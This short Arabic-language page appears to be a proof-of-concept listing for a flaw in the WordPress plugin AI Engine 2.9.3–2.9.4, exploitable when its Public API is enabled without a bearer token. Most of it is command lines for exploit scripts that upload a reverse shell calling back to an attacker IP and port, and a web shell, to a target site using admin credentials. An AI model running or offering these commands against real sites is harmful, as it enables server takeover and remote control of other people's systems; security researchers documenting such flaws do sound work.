
إضافة ووردبريس AI Engine 2.9.3 - 2.9.4 إثبات المفهوم
إضافة ووردبريس AI Engine 2.9.3 - 2.9.4 إثبات المفهوم
يرجى ملاحظة أنه لا يمكن استغلال هذه الثغرة إلا إذا كان خيار "Public API" ممكّنًا، وهو معطّل افتراضيًا، ولم يتم تكوين أي Bearer Token، ولم تتم إضافة أي مصادقة مخصصة تُستخدم لحماية الـ API.
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php